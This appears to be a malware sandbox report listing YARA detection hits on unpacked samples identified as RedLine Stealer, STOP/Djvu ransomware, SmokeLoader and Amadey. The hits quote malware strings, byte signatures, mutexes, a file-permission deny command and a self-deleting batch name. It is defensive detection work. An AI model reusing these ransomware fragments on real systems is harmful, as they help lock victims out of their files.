17.3.325D.exe.25d0e28.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.3.325D.exe.25d0e28.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x23816:$pat14: , CommandLine: 0x1b821:$v2_1: ListOfProcesses 0x19d1b:$v4_3: base64str 0x19cda:$v4_4: stringKey 0x19d25:$v4_5: BytesToStringConverted 0x19d10:$v4_6: FromBase64 0x1b5d7:$v4_8: procName
17.2.325D.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 12 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.3.325D.exe.25d0e28.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.3.325D.exe.25d0e28.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x25616:$pat14: , CommandLine: 0x1d621:$v2_1: ListOfProcesses 0x1bb1b:$v4_3: base64str 0x1bada:$v4_4: stringKey 0x1bb25:$v4_5: BytesToStringConverted 0x1bb10:$v4_6: FromBase64 0x1d3d7:$v4_8: procName
13.2.C474.exe.41215a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.C474.exe.41215a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.C474.exe.41215a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.325D.exe.4171e76.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4171e76.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x246fe:$pat14: , CommandLine: 0x1c709:$v2_1: ListOfProcesses 0x1ac03:$v4_3: base64str 0x1abc2:$v4_4: stringKey 0x1ac0d:$v4_5: BytesToStringConverted 0x1abf8:$v4_6: FromBase64 0x1c4bf:$v4_8: procName
24.2.5274.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.5274.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.5274.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
21.3.96DF.exe.3e20000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
10.2.5274.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.5274.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.5274.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
44.2.5274.exe.41b15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
44.2.5274.exe.41b15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
44.2.5274.exe.41b15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
21.2.96DF.exe.3e10e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
37.2.oneetx.exe.9b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
17.2.325D.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 12 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.2.5274.exe.41815a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.5274.exe.41815a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.5274.exe.41815a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.325D.exe.4172d5e.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4172d5e.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x23816:$pat14: , CommandLine: 0x1b821:$v2_1: ListOfProcesses 0x19d1b:$v4_3: base64str 0x19cda:$v4_4: stringKey 0x19d25:$v4_5: BytesToStringConverted 0x19d10:$v4_6: FromBase64 0x1b5d7:$v4_8: procName
17.2.325D.exe.3e30e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.3e30e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 12 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.2.325D.exe.4320ee8.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4320ee8.5.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x25616:$pat14: , CommandLine: 0x1d621:$v2_1: ListOfProcesses 0x1bb1b:$v4_3: base64str 0x1bada:$v4_4: stringKey 0x1bb25:$v4_5: BytesToStringConverted 0x1bb10:$v4_6: FromBase64 0x1d3d7:$v4_8: procName
44.2.5274.exe.41b15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
44.2.5274.exe.41b15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
44.2.5274.exe.41b15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.5274.exe.40f15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.5274.exe.40f15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.5274.exe.40f15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.617B.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.617B.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.617B.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.5274.exe.40f15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.5274.exe.40f15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.5274.exe.40f15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.617B.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.617B.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.617B.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
20.2.5274.exe.41a15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
20.2.5274.exe.41a15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
20.2.5274.exe.41a15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
14.2.5274.exe.41815a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.5274.exe.41815a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.5274.exe.41815a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.E640.exe.41015a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.E640.exe.41015a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.E640.exe.41015a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.E640.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.E640.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.E640.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
7.2.617B.exe.41415a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.617B.exe.41415a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.617B.exe.41415a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.325D.exe.4172d5e.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.325D.exe.4172d5e.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x25616:$pat14: , CommandLine: 0x1d621:$v2_1: ListOfProcesses 0x1bb1b:$v4_3: base64str 0x1bada:$v4_4: stringKey 0x1bb25:$v4_5: BytesToStringConverted 0x1bb10:$v4_6: FromBase64 0x1d3d7:$v4_8: procName
20.2.5274.exe.41a15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
20.2.5274.exe.41a15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
20.2.5274.exe.41a15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
18.2.C474.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
18.2.C474.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
18.2.C474.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
